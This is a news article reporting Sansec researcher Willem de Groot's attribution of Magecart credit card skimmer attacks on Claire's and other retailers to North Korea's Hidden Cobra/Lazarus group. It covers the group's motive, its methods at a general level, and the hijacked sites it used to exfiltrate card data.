Vladimir Gerasimov - stock.adobe
The North Korean state-sponsored Lazarus or Hidden Cobra advanced persistent threat (APT) group is almost certainly behind a spate of recent cyber attacks that saw the websites of multiple retailers, including Claire’s Accessories, compromised with the Magecart credit card skimmer, according to Sansec researcher Willem de Groot, who has been tracking the group.
North Korean APTs have previously tended to restrict their activity to financial services companies and South Korean cryptocurrency markets, but Sansec found that they have pivoted to targeting retail consumers in the US and Europe in a campaign that has been running for over 12 months.
De Groot told Computer Weekly it was likely that the activity was largely financially motivated – obtaining hard currency is suspected to be the prime motivation behind much of the threat activity originating from within the isolated, secretive and impoverished country.
De Groot said that with cards and CVV codes selling for between $5 and $30 on dark web forums, using Magecart could be a goldmine for the group.
This new discovery also marks something of a sea change for use of Magecart, which has traditionally been dominated by Russian and Indonesian hacking groups.
Sansec said Hidden Cobra probably managed to gain access to the store code of retailers through spearphishing attacks trying to obtain staff passwords. Once inside, they injected the malicious Magecart script into the store checkout page, from where the skimmer collected data input my customers, such as credit card numbers, and exfiltrated it to their server.
De Groot said his team was able to attribute the activity to Hidden Cobra because the attacks were using infrastructure from previous operations to exfiltrate the data.
Read more about Magecart
- Cyber criminals are exploiting misconfigured AWS S3 buckets to run credit card fraud and malvertising campaigns, according to new data.
- RiskIQ researchers have observed a sharp uptick in Magecart credit card attacks, driven by increased traffic to online retailers during the coronavirus pandemic.
The global exfiltration network used by Hidden Cobra is exploiting legitimate sites that have been hijacked and repurposed, which include a Milan-based modelling agency, a vintage music store in Tehran, and an independent bookshop in New Jersey.
The use of these sites was first uncovered in June 2019, and Sansec has been tracking the campaign since then thanks to some unique identifying characteristics and distinctive patterns in the skimmer’s code, more technical details of which can be read in De Groot’s disclosure blog.
The use of shared infrastructure or noteworthy quirks in code are quite common in Magecart attacks – Sansec typically finds between 30 and 100 infected online stores every day so has a fair amount of expertise in this regard. Often, these indicators are quite obvious, for example one recent Indonesian-run campaign used a distinctive debug message “Success bro”. In this case, the indicators were rather more subtle ones.
While De Groot said it was possible that different actors might have simultaneous control over the network of hijacked sites, this was quite unlikely in practice, not least because once a site has been hacked, it is common practice to close off the exploited vulnerability to stop rivals from getting access to the new asset.
It is this that has allowed Sansec to link this spate of attacks to Hidden Cobra with a fair degree of confidence.